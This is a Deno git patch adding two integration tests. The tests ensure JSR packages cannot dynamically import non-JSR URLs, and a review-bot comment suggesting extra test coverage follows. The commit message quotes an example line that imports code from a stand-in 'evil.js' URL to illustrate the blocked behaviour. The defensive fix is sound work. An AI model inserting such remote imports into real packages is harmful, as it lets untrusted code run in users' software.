From 918c5e648f4bd08d768374ccde1b451b84793b76 Mon Sep 17 00:00:00 2001
From: David Sherret
Date: Wed, 28 Feb 2024 16:30:45 -0500
Subject: fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.
---
 tests/integration/jsr_tests.rs | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
(limited to 'tests/integration/jsr_tests.rs')

diff --git a/tests/integration/jsr_tests.rs b/tests/integration/jsr_tests.rs
index fa8a9d8b9..25a0c8663 100644
--- a/tests/integration/jsr_tests.rs
+++ b/tests/integration/jsr_tests.rs
@@ -60,6 +60,22 @@ itest!(deps_info {
   http_server: true,
 });
 
+itest!(import_https_url_analyzable {
+  args: "run -A jsr/import_https_url/analyzable.ts",
+  output: "jsr/import_https_url/analyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
+itest!(import_https_url_unanalyzable {
+  args: "run -A jsr/import_https_url/unanalyzable.ts",
+  output: "jsr/import_https_url/unanalyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
 itest!(subset_type_graph {
   args: "check --all jsr/subset_type_graph/main.ts",
   output: "jsr/subset_type_graph/main.check.out",
-- 
cgit v1.2.3
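Review bot: The two new itest! cases pin only `exit_code: 1` and an `.out` fixture, so nothing in this file says what separates the `analyzable` case from the `unanalyzable` one or why both must fail; a short comment above the first case would help, e.g. `// A JSR package must not load a non-JSR URL through a dynamic import, whether the specifier is a literal the registry can reject at publish time or an expression it cannot analyze; both runs must exit 1.` The fixtures `jsr/import_https_url/analyzable.ts` and `unanalyzable.ts` are outside this diff, so what each actually imports is inferred from the commit description rather than visible here. A companion case in which a JSR package dynamically imports an allowed specifier and exits 0 would guard against the new check being over-broad, since these two only cover the rejection path.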